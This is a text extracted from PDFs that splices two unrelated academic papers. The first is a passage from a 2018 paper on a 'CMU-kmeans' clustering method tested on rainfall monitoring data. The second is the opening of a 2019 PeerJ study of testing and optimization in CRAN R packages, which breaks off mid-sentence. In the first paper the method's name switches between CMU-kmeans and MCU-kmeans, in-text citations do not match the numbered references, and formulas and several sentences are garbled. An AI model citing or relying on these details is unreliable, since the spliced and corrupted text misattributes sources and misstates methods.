Euclidean distance of two points is defined as form.1:   Here, and are the attribute values of x and y respectively, and the criterion function is defined as form.2:   Here, k is the total number of clusters, and is the center of cluster c. The flow of K-means algorithm is shown in Fig. 1. International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 17 Figure 1. K-means clustering algorithm flow chart B. Research status quo of K-means algorithm For the advantages of K-means algorithm, it has been widely used in practice, but there are many shortcomings as well. In order to get better clustering effect, many researchers have explored the shortcomings of improving K- means. Aiming at the shortcomings of K-means algorithm in selecting the initial point, many scholars have proposed an improved method. Duan Guiqin [1] uses the method of product based on mean and maximum distance to optimize the initial clustering center. The algorithm first selects the set of data objects which are the farthest from the sample set to join the clustering center, and then the set of mean and current poly The largest data object of the class center is added to the clustering center set, which improves the accuracy. Yi Baolin [2] et al. proposed another improved K- means algorithm, which first calculates the density of the region to which the data object belongs, and then selects k points as the initial center in the high density region. The experimental results show that the algorithm reduces the initial center point Impact. Yiu-Ming Cheng[3] and others proposed a new clustering technique called K * -means algorithm. The algorithm consists of two separate steps. A center point is provided for each cluster in the first step; and then adjust the unit through adaptive learning rules in the second step. The algorithm overcomes the shortcomings of K-means algorithm initial center sensitivity and K value blindness, but the calculation is complicated. Xie and others [4] proposed a k-means algorithm to optimize the initial clustering center by using the minimum variance based on the sample space distribution compactness information. The algorithm chooses the samples with the smallest variance and a distance away from each other as the initial clustering center. Liu Jiaxing et al.[5] proposed a radius-based k-means + λ algorithm. When selecting the initial center point of the cluster, the distance ratio between points is calculated from the λ parameter and rounded at a specific distance. In the circle, an initialized center point is selected according to the distance ratio, and the algorithm has higher performance in error rate and operation time. Ren Jiangtao[6] proposed an improved K-means algorithm for text clustering, which is improved by using feature selection and dimension reduction, sparse vector selection, initial center point search based on density and spreading, Class accuracy, stability and other aspects have improved. C. The performance analysis of K-means algorithm K-means clustering algorithm uses the Euclidean distance to calculate the distance between each sample point. For the convex and spherical data distribution, the clustering effect is better and has been widely used in many fields. However, the Euclidean distance criterion adopted by the algorithm also has some limitations. For the more complicated or non-convex data, the clustering effect is often not very satisfactory. Clustering algorithm in the iterative process, if you do not meet the termination criteria will recalculate the average clustering center, this operation also improves the convergence rate of the clustering algorithm. In summary, K-means clustering algorithm has the following advantages and disadvantages of the following aspects. 1) The main advantages of K-means algorithm: a) K-means clustering algorithm has high stability and scalability, clustering effect is very well. b) The results of the treatment is intuitive and easy to understand. When dealing with the target data in numerical form, its geometric meaning is very clear. When clustering images and texts, the extracted eigenvalues can be regarded as clustering result values for the convenience of people's understanding. c) K-means clustering algorithm When dealing with numerical data sets, the input data sequence will not affect the clustering result. d) It can be a good judge of the data set shape is convex cluster. 2) The main shortcomings of K-means algorithm: a) The K value in the K-means algorithm needs to be given in advance. According to the K value determined in advance, the clustering samples are classified into K class, so that the sum of squares of all the samples in the clustering domain to the clustering center is minimized. b) Clustering results are highly dependent on the selection of initial clustering centers. The K-means algorithm uses the stochastic method to select the initial clustering center. If the initial clustering center is chosen improperly, it is difficult to obtain the ideal clustering effect. This dependence on the initial value may lead to the International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 18 instability of the clustering results, and it is easy to fall into the local optimal rather than the global optimal results. c) Sensitive to noise and isolated points. d) The time complexity of the algorithm is large. II. IMPROVEMENT OF K-MEANS ALGORITHM AND ITS APPLICATION Aiming at the shortcomings of traditional K-means algorithm, this paper mainly improves on the optimization of initial clustering center to enhance the clustering effect. A. The selection of data object in Cluster analysis The preliminary data are collected firstly when data selecting, then know about the characteristics of data to identify the quality of the data and to find a basic observation of the data or assume the implied information to monitor the subset of data of interest. The data object segmentation variable determines the formation of clustering, which in turn affects the correct interpretation of the clustering results, and ultimately affects the stability of the clustering clusters after the new data objects are added. Before the K-means clustering related data mining, the sample data set related to the data mining clustering analysis should be extracted from the original data object set, and it is not necessary to use all the historical data. In addition, we should pay attention to the quality of data, only high-quality data to the correct analysis of conclusions everywhere, to provide a scientific basis for clustering. The source of this research object is the historical monitoring data of the geological disaster monitoring system. From the records of geological monitoring data from 2016 to 2017, a representative sample of K-means clustering algorithm for this improved algorithm is selected as the object of study in 2000, and the two samples of rainfall are randomly selected in different regions. The sample data attributes show as table1: TABLE I. THE SAMPLE DATA ATTRIBUTES Field number Field name Field code Type of data 1 Id Xx Number 2 Sno Yy Varchar 3 Type type Varchar 4 Gettime time Datatime 5 Alarm Level alarm Integer 6 Value value Double 7 Day Value d_value Double For the cluster analysis, there are obviously redundant ones in the data attributes of the above geological hazard monitoring system, and it does not have the objectivity of the cluster analysis data. Therefore, the redundant ones should be eliminated. Finally, only four data object attributes reflecting the characteristics of rainfall data are selected as the research object. The optimized data attributes show as table2: TABLE II. THE OPTIMIZED DATA ATTRIBUTES Field number Field name Field code Type of data 1 Id xx Number 2 Sno yy Varchar 3 Gettime time Datatime 4 Day Value d_value Double B. Improvement of K-means algorithm It is not difficult to see that, through the above study of the status quo, we can see that most of the above algorithm improvements are only a single defect in the traditional k- means algorithm is optimized. Although these improvements have optimized the k-means algorithm to some extent, there are still many shortcomings. For the above geological disaster monitoring system rainfall data characteristics, the K-means algorithm is very sensitive to the initialization center, and the initial clustering center is very easy to make the clustering result into the local optimum and the influence of the isolated point is large. In this paper, the simple random sampling technique is used to reduce the scale of the data set on the original dataset, and then the improved UPGMA algorithm and Canopy algorithm are combined to propose the CMU-kmeans algorithm. The improved algorithm can select the points with the furthest distance k in the high density region as the initial clustering center according to the regional density of each data, so that the improved k-means algorithm can produce high quality poly The results show that the sensitivity of the algorithm is not only eliminated, but also the stability and validity of the algorithm are improved. 1) Improved UPGMA algorithm a) The basic idea of improved UPGMA algorithm At the beginning of the UPGMA algorithm, each data object in the sample data set is considered as a separate class； and calculates the distance between each two data objects to obtains the distance matrix, then merges the two data objects that are closest to each other to obtain a new subclass, repeat the process .The UPGMA algorithm stops until no new class is generated or the stop condition is satisfied. It can be found that the first subclasses are usually located in the dense area of the data set, so the subclass center selected by this algorithm can be used as the initial clustering center candidate point for the next step. In this way, the selection of the initial clustering center is optimized and its accuracy is improved. The distance between two data objects is measured using the Euclidean distance formula, as form3:    2 1 d m ik jk k sqrt X X           Here, Xi and Xj represent the data objects in the sample data set. Xi={Xi1,Xi2,…,Xik,…,Xim}，k=1,2,…,m Xj={Xi1,Xi2,…,Xik,…,Xjm}，k=1,2,…,m The formula for calculating subclasses is as form4: International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 19  n j 1 1 Z X n j    Here, n refers to the number of data objects contained in a subclass, and Xj refers to a data object in the subclass. b) The description of improved UPGMA algorithm Input: All data in the sample data set, parameters m, p, Q; Output: initial clustering center candidate point. (1) set each data object as a separate class; (2) Calculate the distance between two data objects, and then merge the nearest two classes into a new subclass to determine whether the subclass of the data object containing no less than m% of the total amount of data continues to produce , If not, then go to (4); (3) For (i = 1 to maxcluster) { { for (j = i + 1 to maxcluster) { If the number of data objects in subclasses i and j is less than or equal to m% of the total amount of data, calculate the distance between them to obtain the distance matrix. } } Find the nearest two subclasses i and j and merge them into a new subclass, then add the new subclass to the end of the sequence Q to go to (2); (4) Select the former p% subclasses in the sequence Q as the candidate subclasses and calculate the centers of all candidate subclasses as the initial clustering center candidate points. Using the advantage of the improved UPGMA hierarchical clustering algorithm, we can find the dense region of the data set，which avoid the edge data and the noise data become the initial center candidate point. At the same time, considering the relative intensity of the region, we propose new clustering conditions and filter conditions to change the traditional UPGMA algorithm, so that the generation of subtrees can be stopped at different clustering levels to adapt to the actual density distribution data set. But the improved UPGMA algorithm also has some shortcomings. For example, if the m% and p% values are not set properly, the selection of the initial clustering center candidate points may be too dense and centralized. However, the Canopy algorithm, which introduces the idea of maximum and minimum distance, can select the data points that are far apart from each other. It is necessary to make up the deficiencies of the improved UPGMA algorithm. Therefore, it is necessary to introduce the Canopy algorithm to ensure that the distribution of the initial clustering center is decentralized, which can correctly reflect the data distribution of the original data set. 2) Improved Canopy algorithm In order to avoid the clustering process is locally optimal, it is necessary to make Canopy get the center point spacing as large as possible. The maximum and minimum distance method [30] is a kind of test-based algorithm in the field of pattern recognition. Its basic idea is to take the object as far as possible as a cluster center, trying to get a better initial division. The algorithm not only intelligently determines the number k in the initial clustering, but also improves the efficiency of dividing the initial data set. a) The description of improved Canopy algorithm The Euclidean distance method is used to measure the degree of dissimilarity between data objects. Set the data set, S={X1,X2,…,Xn}, and the initial cluster center set is V = {v1, v2, ..., vn}. The improved Canopy algorithm is described as follows: Input: Improve the initial clustering center candidate point of the UPGMA algorithm output, the parameter θ; Output: Optimize the initial clustering center. (1) Arbitrarily select a data object from the data set S as the first cluster center point v1 and put it into V; (2) Calculate the distance between v1 and all the data objects remaining in the data set S, and put the farthest data object into V as the second cluster center v2; (3) Calculate the distance Di between all the data objects Xi and all the data objects remaining in the data set S, select the smaller distance and denote Min (Di); (4) Selects the maximum value in all the Min(Di) , marked as Max (Min (Di)), and regard the corresponding data Xi as the candidate cluster center, then judgment is made by the discriminant formula Max (Min (Di))> θ || v1- v2 ||. If the condition is satisfied, Xi is added to the initial clustering center set V, and if it is not satisfied, (5) To (3); (6) Output optimization of the initial clustering center. The most critical step in the improved Canopy algorithm is the step (4), which takes the corresponding point of Max as the candidate of the new clustering center, thus avoiding the fact that the distance from an existing clustering center is closer to the other Clustering centers are far away as candidates for possible candidates. Therefore, the algorithm can be used to ensure that each new clustering center is far from the distance of the existing clustering center. b) The analysis of advantages and disadvantages of improved algorithm of Canopy The improved Canopy algorithm can use the k data objects farthest from each other in the data set as the initial clustering center, so as to avoid the situation that the initial clustering center distribution is too concentrated and intensive. But on the one hand, it is possible to select the noise data and the edge data, making the algorithm easy to fall into the local optimal solution, it is difficult to get the global optimal solution. On the other hand, if the sample size of the whole data set is n, we need to scan the database first if we want to find a new cluster center each time; After finding the nearest distance from each object to the existing cluster center, we need scan the database to get the maximum-minimum distance. so we need a total of 2n distance calculation. The time complexity of the improved Canopy algorithm is: O (nk) .if the k clustering centers need to be found in the end of algorithm. Therefore, the computational complexity of the improved Canopy algorithm depends on the size of n, and there are thousands of objects in large databases usually, if we treat the original data set International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 20 with the improved Canopy algorithm directly, the implementation efficiency is low and the required storage space will be significantly increased. 3) MCU-kmeans algorithm Generally, in order to ensure fully reflecting the distribution of data in the entire data set, every cluster center should be distributed in the high density area of the data set and dispersed as much as possible. Based on the above considerations, this paper proposes the MCU-kmeans algorithm, which combines the improved UPGMA algorithm and the improved Canopy algorithm to obtain the optimized initial clustering center, and then apply these optimized initial clustering centers to the k-means algorithm to enhance the clustering effect. Among them, the improved UPGMA algorithm is used to find the high density region, so that the selected initial clustering center candidate point away from the noise data and edge data; And the improved Canopy algorithm is used to avoid that the initial clustering center distribution is too concentrated and dense to ensure that the distances between the cluster center points are far away, which fully reflect the overall distribution of the data set. Therefore, the improved UPGMA algorithm and the improved Canopy algorithm complement each other so that the initial clustering centers selected by the algorithm are far apart from each other and all are located in the high density region of the data set. To sum up, the CMU-kmeans algorithm is as follows. a) The initialization of the cluster center;  Improved UPGMA algorithm: obtain the initial clustering center candidate point;  Improved Canopy algorithm: obtain the appropriate initial clustering center; b) K-means algorithm iteration; c) The assessment of clustering results. It can be seen that the framework of the CMU-kmeans algorithm is divided into three phases, as shown in Figure 2, the first stage of the algorithm is the initial optimization algorithm, which is the most important part of the improvement. The purpose is to intelligently capture the original The optimal initial clustering seed and the optimal initial clustering number of the data set distribution. The second stage is the main body of the algorithm, and the K- means algorithm is used to cluster on the whole data set and get the clustering result. The third stage is experiment and evaluated to verify the validity of the proposed CMU- kmeans algorithm. It can be seen that the framework of the CMU-kmeans algorithm is divided into three phases, as shown in Fig.2 , the first stage of the algorithm is the initial optimization algorithm, which is the most important part of the improvement. The purpose is to intelligently capture the optimal initial clustering seed and the number of the data set distribution. The second stage is the main body of the algorithm, and the K-means algorithm is used to cluster on the whole data set and get the clustering result. The third stage is experiment and evaluated to verify the validity of the proposed CMU-kmeans algorithm. Figure 2. CMU-kmeans algorithm framework The CMU-kmeans algorithm proposed in this paper can effectively reduce the dependency of the k-means algorithm on the initial clustering center selection. For the data set with uneven data distribution, on the one hand, it avoids the idea that the initial clustering center is too dense; On the other hand, it avoids the fact that the selected initial clustering centers are too scattered and even select noise data and edge data is happening, which can improve the stability and validity of the algorithm. At the same time, the number k of the initial clustering center can be automatically determined without the pre-set and the simplicity and maneuverability of the algorithm can be improved. III. EXPERIMENT ANALYSIS A. Experimental description The data set selected from the experiment comes from the rainfall data collected in the geological hazard detection system and the rainfall data set after the artificial noise is added. The experimental environment is: Inter(R)Core(TM)i3-2330M,4G RAM，250G hard disk， Win7 operating system. In order to verify the validity and stability of the algorithm, the traditional K-means clustering algorithm, the improved Canopy algorithm and the CMU-kmeans algorithm are compared under the rainfall data set. The clustering result of the traditional k-means algorithm is an average of 10 executions. Evaluate the performance of the algorithm according to the accuracy of the clustering results and the recall rate. B. Performance evaluation criteria The traditional k-means algorithm, the improved Canopy algorithm and the clustering effect of CMU-kmeans algorithm proposed in this paper are evaluated by the commonly used evaluation method to evaluate the quality of clustering effect, namely, precision and recall. The accuracy and recall rate are defined as follows: P（i, j）= precision(i, j) = Ni,j / Ni (5) International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 21 R（i, j）= recall(i, j) = Ni,j / Nj (6) Here, Ni, j represents the number of classes i in cluster j; Ni is the number of all objects in class i; Nj is the number of all objects in cluster j. C. Experimental content and structure analysis Table3 below shows the detailed experimental results of the three algorithms on the geo-disaster monitoring system rainfall data set. TABLE III. DETAILED EXPERIMENTAL RESULTS ON THE RAINFALL DATASET Rainf all set k-means algorithm Improved Canopy algorithm CMU-kmeans algorithm precisi on recall Precisi on recall precisi on recall 1st 25.423 26.125 50.799 61.078 56.939 65.783 2nd 24.287 25.365 52.975 63.288 56.423 64.921 3rd 25.61 18.864 48.895 58.887 57.413 66.174 4th 27.143 26.143 53.425 63.683 57.682 68.108 5th 22.365 25.31 50.073 58.404 56.163 65.063 6th 18.102 26.421 50.444 64.65 56.468 65.224 7th 25.326 24.623 49.362 57.338 58.921 67.638 8th 28.325 26.852 49.975 60.075 56.239 66.405 9th 26.562 28.154 54.267 62.392 58.341 66.423 10th 23.985 26.523 51.445 60.651 57.267 65.392 average 25.013 25.938 51.666 61.045 57.186 66.113 As can be seen from the above table, in ten experiments, values of the two performance evaluation criteria (precision and recall)vary greatly based on the traditional k-means algorithm ,showing a very unstable state. To precision as an example, the minimum value of the ten experimental results is 18.102, and the maximum is 28.325, the difference is 10.323, and the recall is different from 9.290. The result of the improved Canopy algorithm has improved, the precision is 6.549, and the difference is 6.345. In the CMU-kmeans algorithm, the values of the two performance evaluation criteria are obviously improved and are still stable. The precision of the ten results is 56.163, the maximum is 58.921, the difference is 2.758, and the recovery value is 3.187. In order to make the experimental results more straightforward, the above 10 experimental results with the wave diagram shown in order to compare the stability of the two algorithms and accuracy. Figure 3. The precision and recall values of the traditional k-means algorithm Figure 4. The precision and recall values of the improved Cannopy algorithm 15.00% 25.00% 35.00% 45.00% 55.00% 65.00% 1 2 3 4 5 6 7 8 9 10 recall precision 47.00% 52.00% 57.00% 62.00% 67.00% 72.00% 1 3 5 7 9 precision recall International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 22 Figure 5. The precision and recall values of the CMU-kmeans algorithm It can be seen from Fig.3 , Fig.4 and Fig.5 that the improved Canopy algorithm clustering effect is improved on the basis of the traditional k-means algorithm. The improved CMU-kmeans algorithm can improve the state of the improved Canopy algorithm. The precision and recall value of the CMU-kmeans algorithm are small and obviously improved, and the lifting effect is significant. IV. CONCLUSION The CMU-kmeans algorithm improves the clustering effect, make the performance tend to be stable, and the computational complexity of the calculation is obviously reduced compared with the traditional k-means algorithm and the improved Canopy algorithm. Also, the algorithm can adaptively determine the number k of the initial clustering center, avoid the influence of the noise data and the edge data and random selection of initial clustering center, and also well reflect the actual distribution of clustering center in the dataset. REFERENCES [1] Zhai D H，Yu J，Gao F，et al. k-means text clustering algorithm based oninitial cluster centers selection according to maximum distance [J]. Application Research of Computers，2014，31(3):379 – 382. [2] Baolin Yi，Haiquan Qiao，Fan Yang，Chenwei Xu. An Improved Initialization Center Algorithm for K-Means Clustering[C]. Computational Intelligence and Software Engineering，2010，pp:1- 4. [3] Redmond S J，Heneghan C.A method for initializing the K-means clustering algorithm using kd-trees[J]. Pattern recognition letters， 2007，28(8):965-973. [4] Liu J X, Zhu G H, Xi M. A k-means Algorithm based on the radius [J]. Journal of Guilin University of Electronic Technology,2013,33(2):134-138. [5] Habibpour R, Khalipour K. A new k-means and K-nearest-neighbor algorithms for text document clustering [J]. International Journal of Academic Research Part A, 2014,6( 3) : 79 － 84. [6] Data mining techniques and applications - A decade review from 2000 to 2011[J]. Shu-Hsien Liao, Pei-Hui Chu, Pei-Yuan Hsiao. Expert Systems With Applicati--ons . 2012 (12). [7] Application of Improved K-Means Clustering Algorithm in Transit Data Collection. Ying Wu, Chun long Yao. 20103rd International Conference on Biomedical Engineering and Informatics (BMET）. 2010. [8] Zhou A W, Yu Y F. The research about clustering algorithm of K- means [J]. Computer Technology and Development, 2011,21(2):62- 65. [9] Duan G Q. Auto generation cloud optimization based on genetic algorithm [J]. Computer and Digital Engineering, 2015,43(3):379- 382. [10] Wang C L, Zhang J X. Improved k-means algorithm based on latent Dirichlet allocation for text clustering [J]. Journal of Computer Applications,2014,34(1):249-254. [11] Deepa V K,Geetha J R R. Rapid development of applications in data mining[C]. Green High Performance Computing (ICGHPC),2013,pp:1-4. [12] Sharma S, Agrawal J, Agarwal S, et al. Machinelearn-ing techniques for data mining: A survey[C]. Com-putational Intelligence and Computing Research (ICCIC),2013,pp:1-6. [13] Efficient Data Clustering Algorithms: Improvements over Kmeans[J]. Mohamed Abubaker, Wesam Ashour. International Journal of Intelligent Systems and Applications(IJISA). 2013 (3). [14] Fahad A, Alshatri N, Tari Z, Alamri A. A Survey of Clustering Algorithms for Big Data: Taxonomy and Empirical Analysis[C]. Emerging Topics in Computing.2014:267-279. [15] Abubaker M, Ashour Wesam. Efficient data clustering algorithm algorithms:improvemwnts over k-means[J]. I nternational Journal of Intelligent Systems and Applications.2013(3):37-49. [16] Tang Zhaoxia, Zhang Hui. Improved K-means Clustering Algorithm Based on Genetic Algorithm[C], Telkomnika Indonesian Journal of Electrical Engineering.2014, pp:1917-1923. 47.00% 52.00% 57.00% 62.00% 67.00% 72.00% 1 3 5 7 9 precision recall http://kns.cnki.net/kcms/detail/detail.aspx?filename=SJES13011501637554&dbcode=SSJD http://kns.cnki.net/kcms/detail/detail.aspx?filename=SJES13011501637554&dbcode=SSJD http://kns.cnki.net/kcms/detail/detail.aspx?filename=SJMS13061700000135&dbcode=SSJD work_g4a2btckubh4rf5s7hbkwbzvpu ---- Software engineering principles to improve quality and performance of R software Software engineering principles to improve quality and performance of R software Seth Russell1, Tellen D. Bennett1,2 and Debashis Ghosh1,3 1 University of Colorado Data Science to Patient Value, University of Colorado Anschutz Medical Campus, Aurora, CO, USA 2 Pediatric Critical Care, University of Colorado School of Medicine, Aurora, CO, USA 3 Department of Biostatistics and Informatics, Colorado School of Public Health, Aurora, CO, USA ABSTRACT Today’s computational researchers are expected to be highly proficient in using software to solve a wide range of problems ranging from processing large datasets to developing personalized treatment strategies from a growing range of options. Researchers are well versed in their own field, but may lack formal training and appropriate mentorship in software engineering principles. Two major themes not covered in most university coursework nor current literature are software testing and software optimization. Through a survey of all currently available Comprehensive R Archive Network packages, we show that reproducible and replicable software tests are frequently not available and that many packages do not appear to employ software performance and optimization tools and techniques. Through use of examples from an existing R package, we demonstrate powerful testing and optimization techniques that can improve the quality of any researcher’s software. Subjects Computer Education, Data Science, Software Engineering Keywords Unit testing, Profiling, Optimization, Software engineering, R language, Statistical computing, Case study, Reproducible research, Data science INTRODUCTION Writing scientific software has progressed from the work of early pioneers to a range of computer professionals, computational researchers, and self-taught individuals. The educational discipline of computer science, standardized many years ago through recommendations from the Association for Computing Machinery (ACM) (Atchison et al., 1968), has grown in breadth and depth over many years. Software engineering, a discipline within computer science, “seeks to develop and use systematic models and reliable techniques to produce high-quality software. These software engineering concerns extend from theory and principles to development practices that are most visible to those outside the discipline” (The Joint Task Force on Computing Curricula, 2015). As they gain sophistication, computational researchers, statisticians, and similar professionals need to advance their skills by adopting principles of software engineering. Wilson et al. (2014) identified eight key areas where scientists can benefit from software engineering best practices. The term “best” as referenced in the previous cited work and others cited later refers to expert consensus based on knowledge and observational reporting of results from application of the practices. They provide a high-level description of eight important principles of software engineering that should How to cite this article Russell S, Bennett TD, Ghosh D. 2019. Software engineering principles to improve quality and performance of R software. PeerJ Comput. Sci. 5:e175 DOI 10.7717/peerj-cs.175 Submitted 12 October 2018 Accepted 11 January 2019 Published 4 February 2019 Corresponding author Seth Russell, seth.russell@ucdenver.edu Academic editor Sebastian Ventura Additional Information and Declarations can be found on page 21 DOI 10.7717/peerj-cs.175 Copyright 2019 Russell et al. Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.175 mailto:seth.�russell@�ucdenver.�edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.175 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ “reduce the number of errors in scientific software, make it easier to reuse, and save the authors of the software time and effort that can used for focusing on the underlying scientific questions.” While their principles are still relevant and important today, there has not been enough progress in this endeavor, especially with respect to software testing and software optimization principles (Wilson, 2016; Nolan & Padilla-Parra, 2017). The ACM/Institute of Electrical and Electronics Engineers recommendations for an undergraduate degree in software engineering describe a range of coursework and learning objectives. Their guidelines call out 10 specific knowledge areas that should be part of or guide all software engineering coursework. The major areas are: computer science fundamentals, math and engineering fundamentals, professional interactions/ communication, software modeling, requirement gathering, software design, verification, project processes, quality, and security (The Joint Task Force on Computing Curricula, 2015). These major themes are not covered extensively outside software engineering and include such generally applicable items such as software verification, validation, testing, and computer science fundamentals (for example, software optimization, modeling, and requirement gathering). In addition to the need for further training, understanding the software lifecycle is necessary: the process of software development from ideation to delivery of code. The largest component of software’s lifecycle is maintenance. Software maintenance costs are large and increasing (Glass, 2001; Dehaghani & Hajrahimi, 2013; Koskinen, 2015); some put maintenance at 90% of total software cost. The chief factor in software maintenance cost is the time of the people creating and using the software. From the recent trend on making research results reproducible and replicable, some recommend making code openly available to any who might wish to repeat or further analyze results (Leek & Peng, 2015). With the development of any software artifact, an important consideration for implementation should be maintenance. As research scientists tend to think of their software products as unique tools that will not be used regularly or for a long period, they often do not consider long term maintenance issues during the development phase (Sandve et al., 2013; Prins et al., 2015). While a rigorous and formal software engineering approach is not well suited to the standard lifecycle of research software (Wilson, 2016), there are many techniques that can help to reduce cost of maintenance and speed development. While best practices such as the use of version control software, open access to data, software, and results are becoming more wide spread, other practices such as testing and optimization need further attention. In this paper, a brief survey of currently available R packages from The Comprehensive R Archive Network (CRAN) will be used to show the continued need for software testing and optimization. Source code for this analysis is freely available at https://github.com/magic-lantern/SoftwareEngineeringPrinciples. After the presentation of the current state of R packages, general advice on software testing and optimization will be presented. The R package “pccc: Pediatric Complex Chronic Conditions” (Feinstein et al., 2018; DeWitt et al., 2017) (pccc), available via CRAN and at https://github.com/CUD2V/pccc, is used for code examples in this article. pccc is a combined R and C++ implementation of the Pediatric Complex Chronic Conditions Russell et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.175 2/26 https://github.com/magic-lantern/SoftwareEngineeringPrinciples https://github.com/CUD2V/pccc http://dx.doi.org/10.7717/peerj-cs.175 https://peerj.com/computer-science/ software released as part of a series of research papers (Feudtner, Christakis & Connell, 2000; Feudtner et al., 2014). pccc takes as input a data set containing International Statistical Classification of Diseases and Related Health Problems (ICD) Ninth revision or Tenth revision diagnosis and procedure codes and outputs which if any complex chronic conditions a patient has. ANALYSIS OF R PACKAGES ON CRAN Testing of R packages In order to estimate the level of testing common among R software, we analyzed all R packages available through CRAN. Although Nolan & Padilla-Parra (2017) performed a similar analysis in the past, due to the rapid change in the CRAN as a whole, a reevaluation is necessary. At the time of Nolan’s work, CRAN contained 10,084 packages; it now contains 13,509. Furthermore, the analysis by Nolan had a few shortcomings that we have addressed in this analysis: there are additional testing frameworks for which we wanted to analyze their usage; not all testing frameworks and R packages store their test code in a directory named “tests”; only packages modified in the past 2 years were reported—there are many commonly used R packages that have not been updated in the last 2 years. Although we address some shortcomings in analyzing R code for use of testing best practices, our choice of domain for analysis does have some limitations. Not all research software is written in R; for those that do use R, not all software development results in a package published on CRAN. While other software languages have tools for testing, additional research would be needed to evaluate level of testing in those languages to see how it compares to this analysis. Although care has been taken to identify standard testing use cases and practices for R, testing can be performed in-line through use of core functions such as stop() or stopifnot(). Also, developers may have their own test cases they run while developing their software, but did not include them in the package made available on CRAN. Unit tests can be considered executable documentation, a key method of conveying how to use software correctly (Reese, 2018). Published research that involves software is not as easy to access and evaluate for use of testing code as CRAN packages are. While some journals have standardized means for storing and sharing code, many leave the storing and sharing of code up to the individual author, creating an environment where code analysis would require significant manual effort. To analyze use of software testing techniques, we evaluated all CRAN packages on two different metrics: Metric 1: In the source code of each package, search for non-empty testing directories using the regular expression pattern “[Tt]est[̂/]�/.+”. All commonly used R testing packages (those identified for metric 2) recommend placing tests in a directory by themselves, which we look for. Metric 2: Check for stated dependencies on one of the following testing packages: RUnit (Burger, Juenemann & Koenig, 2015), svUnit (Grosjean, 2014), testit (Xie, 2018), testthat (Wickham, 2011), unitizer (Gaslam, 2017), or unittest Russell et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.175 3/26 http://dx.doi.org/10.7717/peerj-cs.175 https://peerj.com/computer-science/ (Lentin & Hennessey, 2017). From the authors of these packages, it is recommended to list dependency (or dependencies) to a testing framework even though standard usage of a package may not require it. For the testing analysis, we used 2008 as the cutoff year for visualizations due to the low number of packages last updated prior to 2008. As shown in Fig. 1, the evaluation for the presence of a non-empty testing directory shows that there is an increasing trend in testing R packages, with 44% of packages updated in 2018 having some tests. Table S1 contains the data used to generate Fig. 1. As shown in Fig. 2, reliance upon testing frameworks is increasing over time both in count and as a percentage of all packages. There 16 packages that list dependencies on more than one testing framework (nine with dependencies on both RUnit and testthat, seven with dependencies on both testit and testthat), so the total number of packages shown in the histogram includes 16 that are double counted. Table S2 contains the data used to generate Fig. 2. As the numbers from Metric 1 do not match the numbers of Metric 2, some additional exploration is necessary. There are 884 more packages identified from Metric 1 vs Metric 2. There are 1,115 packages that do not list a dependency to a testing framework, but have a testing directory; for example, the package xlsx (Dragulescu & Arendt, 2018). Some packages use a testing framework, but do not list it as a dependency; for example, the package redcapAPI (Nutter & Lane, 2018). There are also 231 packages that list a testing framework as a dependency, but do not contain a directory with tests. See Tables S1 and S2 for more details. Figure 1 Packages with non-empty testing directory. Count of packages with files in standard testing directories by year a package was last updated. Testing directory “Yes” is determined by the presence of files matching the regular expression “[Tt]est[̂/]�/.+”; if no matches are found for an R package, it is counted as a “No”. Full-size DOI: 10.7717/peerj-cs.175/fig-1 Russell et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.175 4/26 http://dx.doi.org/10.7717/peerj-cs.175/supp-1 http://dx.doi.org/10.7717/peerj-cs.175/supp-2 http://dx.doi.org/10.7717/peerj-cs.175/supp-1 http://dx.doi.org/10.7717/peerj-cs.175/supp-2 http://dx.doi.org/10.7717/peerj-cs.175/fig-1 http://dx.doi.org/10.7717/peerj-cs.175 https://peerj.com/computer-science/ Optimization of R packages In order to estimate the level of software optimization common among R software, we performed an analysis of all R packages available through CRAN. To analyze the use of software optimization tools and techniques, we evaluated all CRAN packages on two different metrics: Metric 1: In the source code of each package, search for non-empty src directories using the regular expression pattern “src[̂/]�/.+”. By convention, packages using compiled code (C, C++, Fortran) place those files in a “/src” directory. Metric 2: Check for stated dependencies on packages that can optimize, scale performance, or evaluate performance of a package. Packages included in analysis are: DSL (Feinerer, Theussl & Buchta, 2015), Rcpp (Eddelbuettel & Balamuta, 2017), RcppParallel (Allaire et al., 2018a), Rmpi (Yu, 2002), SparkR (Apache Software Foundation, 2018), batchtools (Bischl et al., 2015), bench (Hester, 2018), benchr (Klevtsov, Antonov & Upravitelev, 2018), doMC (Calaway, Analytics & Weston, 2017), doMPI (Weston, 2017), doParallel (Calaway et al., 2018), doSNOW (Calaway, Corporation & Weston, 2017), foreach (Calaway, Microsoft & Weston, 2017), future (Bengtsson, 2018), future.apply (Bengtsson & R Core Team, 2018), microbenchmark (Mersmann, 2018), parallel (R Core Team, 2018), parallelDist (Eckert, 2018), parallelMap (Bischl & Lang, 2015), partools (Matloff, 2016), profr (Wickham, 2014a), profvis (Chang & Luraschi, 2018), rbenchmark (Kusnierczyk, Eddelbuettel & Hasselman, 2012), snow (Tierney et al., 2018), sparklyr (Luraschi et al., 2018), tictoc (Izrailev, 2014). Figure 2 Packages with testing framework dependency. Count of dependencies on a testing package (RUnit, svUnit, testit, testthat, unitizer, unittest) by year a package was last updated. Packages with no stated dependency from their DESCRIPTION file for one of the specified packages are listed as “none”. Full-size DOI: 10.7717/peerj-cs.175/fig-2 Russell et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.175 5/26 http://dx.doi.org/10.7717/peerj-cs.175/fig-2 http://dx.doi.org/10.7717/peerj-cs.175 https://peerj.com/computer-science/ For the optimization analysis, we used 2008 as the cutoff year for visualizations showing presence of a src directory due to the low number of currently available packages last updated prior to 2008. For optimization related dependencies, in order to aid visual understanding, we used 2009 as the cutoff year and only showed those packages with 15 or greater dependent packages in a given year. Automatically analyzing software for evidence of optimization has similar difficulties to those mentioned previously related to 